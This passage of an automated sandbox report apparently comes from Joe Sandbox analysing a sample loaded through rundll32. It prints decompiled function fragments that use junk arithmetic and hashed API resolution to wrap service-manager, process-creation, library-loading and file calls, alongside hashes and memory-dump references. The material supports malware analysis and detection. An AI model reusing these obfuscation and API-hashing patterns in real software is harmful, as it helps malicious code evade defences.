Instruction ID: 716052fe855ea13665ebf5abd246c7cbf7d1e3688c183941c68cdbe58b348785
Opcode Fuzzy Hash: 13c1f5a0f658e28ba005cb8ea1a88993c2b4061e6ffaa2c2eeee22f86365a62f
Instruction Fuzzy Hash: 3F01F7BA6032113B776186B67C88C7F2AEDCDC29A03950128FE04D2182EE609E0583B1

Uniqueness

Uniqueness Score: -1.00%

Function 10027FC1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 10027FF3

Strings

, xrefs: 10028038

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 3a224a1f1f04e7e62542cf44cd4d6c34aff0542209651b92aeebe781e589c52f
Instruction ID: e87e1bac75f9c46fc66be9f70f9a8a28e7f0d75fdbebaedb1d1c5d1f5bc6a8a6
Opcode Fuzzy Hash: 3a224a1f1f04e7e62542cf44cd4d6c34aff0542209651b92aeebe781e589c52f
Instruction Fuzzy Hash: 644158745052989BEB61CA14DDC4BEB7BFDEB15304FA044ACFACA87082D235AF498B10

Uniqueness

Uniqueness Score: -1.00%

Function 00202959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00202959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0020602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002107A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0020295f
0x00202964
0x00202967
0x0020296a
0x0020296d
0x0020296e
0x0020296f
0x00202977
0x00202985
0x0020298a
0x00202992
0x0020299a
0x002029a2
0x002029a9
0x002029b0
0x002029b7
0x002029bb
0x002029cf
0x002029dc
0x002029e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002029DC

Strings

<^, xrefs: 00202977

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 0b6b64cd32a8cfb3bf9d9c1a397dc65fa9aaf8b5bec0d109a67a54a103bc6b1c
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 2B016D72A00208BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0020C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0020C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0020602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002107A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0020c6e1
0x0020c6e6
0x0020c6f0
0x0020c6fc
0x0020c703
0x0020c706
0x0020c70d
0x0020c711
0x0020c715
0x0020c71c
0x0020c723
0x0020c72a
0x0020c731
0x0020c738
0x0020c751
0x0020c762
0x0020c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0020C762

Strings

/O, xrefs: 0020C6E6

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: de9e8ce7d233097540075d8f6e5b88005d061cda622bef5883e4b8339969054b
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 441133B290122DBBCB25DF95DC498EFBFB9EF04714F108188F90962250D3B14B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00201000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00201000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0020602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002107A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00201006
0x00201009
0x0020100c
0x00201011
0x00201016
0x0020101d
0x00201026
0x0020102d
0x00201034
0x0020103b
0x00201047
0x0020104f
0x00201057
0x0020105e
0x00201065
0x0020106c
0x00201073
0x00201077
0x0020108b
0x00201096
0x0020109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00201096

Strings

[, xrefs: 0020103B

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 8b15f08e846e892d74abad7ba779240cce80bb8dbe0ab06e793bf08e6acb311c
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: FF015BB6D01309FBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00204859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00204859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002107A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0020485e
0x0020487a
0x0020487d
0x00204884
0x0020488b
0x00204892
0x0020489d
0x002048a0
0x002048ad
0x002048b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002048B7

Strings

[, xrefs: 0020488B

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 599342f77a71a3a41b96d9e53b9668f9ebe2630e5a728624364a66c51a74e531
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 23F017B0A15209FBDB04CFE8CA9699EBFF9EB40301F20818CE444B7290E3B15F519B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002A310, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?), ref: 1002A350

Strings

InitializeCriticalSectionEx, xrefs: 1002A320

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: c29a7883f4539586945b36bb1f00055c7dd39741731306cf3fc9d944f25f1b99
Instruction ID: 89e2b04c8fbb43218a6618a6d479a3faddb58d8543dff9c8057a59943af156c2
Opcode Fuzzy Hash: c29a7883f4539586945b36bb1f00055c7dd39741731306cf3fc9d944f25f1b99
Instruction Fuzzy Hash: FAE09A32900228B7CB12AF50DC08CDE7F25EF053A1BA08020FE0C99222CB728D20ABC4

Uniqueness

Uniqueness Score: -1.00%

Function 1002A047, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 1002A07B

Strings

FlsAlloc, xrefs: 1002A057

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 5c722b4938ba971166e469df948cf8ca82532ba69aa15712d9b066e3c7964253
Instruction ID: e297e765f5911ce58cd0a3eb98764831447a74d013a8c1969b92fd57f96cda80
Opcode Fuzzy Hash: 5c722b4938ba971166e469df948cf8ca82532ba69aa15712d9b066e3c7964253
Instruction Fuzzy Hash: BAE0C23254023477D311A2A06C44DCE7E44DFA27A2BA00034FF08E2111DF661C5185DD

Uniqueness

Uniqueness Score: -1.00%

Function 100283B2, Relevance: 3.2, APIs: 2, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 10027EC5: GetOEMCP.KERNEL32(00000000,1002815C,?,10010887,1004E520,1004E520,10010887), ref: 10027EF0

IsValidCodePage.KERNEL32(-00000030,00000000,75FF016A,?,?,?,100281A3,?,00000000,?,?,?,?,?,?,1004E520), ref: 10028410
GetCPInfo.KERNEL32(00000000,100281A3,?,?,100281A3,?,00000000,?,?,?,?,?,?,1004E520,10010887), ref: 10028452

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: af854a28b99d946c68302d2f227090b7555cb399ba289a87278f2c3e4cfc777a
Instruction ID: 1292c3733ea5ef0b459f7b4b9d6145809bbcf0ab6f8e350e1ac26d0884e01cb9
Opcode Fuzzy Hash: af854a28b99d946c68302d2f227090b7555cb399ba289a87278f2c3e4cfc777a
Instruction Fuzzy Hash: E6513578A017568FDB20DF75E8406ABBBE5EF41344F90806FE086CB251E734EA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10028141, Relevance: 3.1, APIs: 2, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 10027EC5: GetOEMCP.KERNEL32(00000000,1002815C,?,10010887,1004E520,1004E520,10010887), ref: 10027EF0

_free.LIBCMT ref: 100281B9

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b6c1b75cf25582137791295a8fb0e9fc90189f29a5ca7fb7a3f68677a9a9983f
Instruction ID: b54d8657c3404ae1227455dc142fa3ead591e73700c1e05800aa58c25d242379
Opcode Fuzzy Hash: b6c1b75cf25582137791295a8fb0e9fc90189f29a5ca7fb7a3f68677a9a9983f
Instruction Fuzzy Hash: 1531A379900249AFDB01DFA8E840A9E77F8FF44354F51016AF915DB2A1EB31AE11CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002B89A, Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1002B8C8
_free.LIBCMT ref: 1002B8EE

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b263a38b5c9bc2508bc79bb9f05436974a6eabe49eb372b0c4a01586cd46ed63
Instruction ID: 2a755c13c050d183703ed98df87f73a555c2f74e7236858a3b8186707cbcc6ed
Opcode Fuzzy Hash: b263a38b5c9bc2508bc79bb9f05436974a6eabe49eb372b0c4a01586cd46ed63
Instruction Fuzzy Hash: 6911E671A046625BF720DB28BD85B0533E8D742374F99072AF629DB2D1EA70DC828384

Uniqueness

Uniqueness Score: -1.00%

Function 100024F7, Relevance: 3.1, APIs: 2, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,00004000,00000000,00000000,?,100026AE,?,?,?,00000018,00000000,00000000,?), ref: 1000253C
VirtualProtect.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,100026AE,?,?,?,00000018,00000000,00000000,?), ref: 10002585

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Virtual$FreeProtect
String ID:
API String ID: 2581862158-0
Opcode ID: 1386b0ded374da49f1cd6f70c6048c5dd5653c1bca3ca1c7d211eb0841789e4e
Instruction ID: e51ceea41273e8a754766f9e864be966224bb85f234d35eeffc3d3ca3a938713
Opcode Fuzzy Hash: 1386b0ded374da49f1cd6f70c6048c5dd5653c1bca3ca1c7d211eb0841789e4e
Instruction Fuzzy Hash: 8211E032B009158FE304DE09CCA0F16B7AAFF957A1F868158E806CB265DB30ED80CA84

Uniqueness

Uniqueness Score: -1.00%

Function 1001108A, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 100110D2

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 136e8264bd6b277982498fb8982027de4c9d58594c2cae3cb06861e7f2875850
Instruction ID: 0111380563e3a9ff58851abe999957ead0dd13a3de9bd6ab037c1be5c9088953
Opcode Fuzzy Hash: 136e8264bd6b277982498fb8982027de4c9d58594c2cae3cb06861e7f2875850
Instruction Fuzzy Hash: 89E0E53AD0A5B142F327D77A7D0129E16C5DB86376F110326F820CF1D1DFB089C15596

Uniqueness

Uniqueness Score: -1.00%

Function 00214F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00214F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0020602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002107A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00214f80
0x00214f81
0x00214f82
0x00214f86
0x00214f87
0x00214f8c
0x00214fa5
0x00214fa8
0x00214faf
0x00214fb6
0x00214fc7
0x00214fca
0x00214fd7
0x00214fe2
0x00214fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00214FE2

Strings

{#lm, xrefs: 00214FC2

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: eb21ee4bf8a713436f3340f1e3de89525a8c78b7de3c0c60d9b85af5d62893ab
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 92F037B081120CFFDB04DFA4D98689EBFBAEB40300F208199E804AB250D3715B619B50

Uniqueness

Uniqueness Score: -1.00%

Function 10005B14, Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10005B32
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10005B3D

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 17f7976ac9e9d55e73ccc180a4db989e266e98219e045f9a63b873bfabc5d0aa
Instruction ID: 5cd2f35f43c97ca4945b5701e3fc13db3cba3f53332ee10a1f45c835a382b29d
Opcode Fuzzy Hash: 17f7976ac9e9d55e73ccc180a4db989e266e98219e045f9a63b873bfabc5d0aa
Instruction Fuzzy Hash: D5D0C979508242987924F6B56D02A8F7384DB021F6B616267E620CA0CAEF23B4466A35

Uniqueness

Uniqueness Score: -1.00%

Function 0021976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0021976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002107A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00219772
0x00219773
0x00219778
0x0021977a
0x0021977b
0x0021977e
0x0021977f
0x00219782
0x00219785
0x00219788
0x00219789
0x0021978c
0x0021978f
0x00219790
0x00219791
0x00219794
0x00219797
0x0021979a
0x0021979d
0x002197a0
0x002197a3
0x002197a6
0x002197a7
0x002197a8
0x002197ad
0x002197b7
0x002197c3
0x002197ca
0x002197d1
0x002197d8
0x002197df
0x002197e3
0x002197fc
0x00219816
0x0021981d

APIs

CreateProcessW.KERNEL32(0020591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0020591A), ref: 00219816

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 915ae4b0666a68d244465b2afcc6359c1d95baa4dbb2b038187475594696da5c
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 1211D372800148FBDF199F92DC0ACDF7F7AEF89750F104048FA1452120D2728AA0EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10029D17, Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4028b3ffdbf220f5ccbab449946e7a0f9cd60c0eee147c0f303152eafb118c99
Instruction ID: 2a7355f5bd8dfc1c477535d0dfa17a080f77eb11a6ba006502a217067f0a1b70
Opcode Fuzzy Hash: 4028b3ffdbf220f5ccbab449946e7a0f9cd60c0eee147c0f303152eafb118c99
Instruction Fuzzy Hash: 2F01B537700621AFFB15DE69ED80A8A37D6EB862E07A14121FE04DB155DA30D801E754

Uniqueness

Uniqueness Score: -1.00%

Function 0020B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0020B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0020602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002107A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0020b569
0x0020b56a
0x0020b56d
0x0020b572
0x0020b574
0x0020b577
0x0020b57a
0x0020b57d
0x0020b580
0x0020b583
0x0020b586
0x0020b587
0x0020b58a
0x0020b58d
0x0020b590
0x0020b593
0x0020b594
0x0020b595
0x0020b59a
0x0020b5a4
0x0020b5b8
0x0020b5c0
0x0020b5c4
0x0020b5cb
0x0020b5d2
0x0020b5d9
0x0020b5e6
0x0020b5fd
0x0020b604

APIs

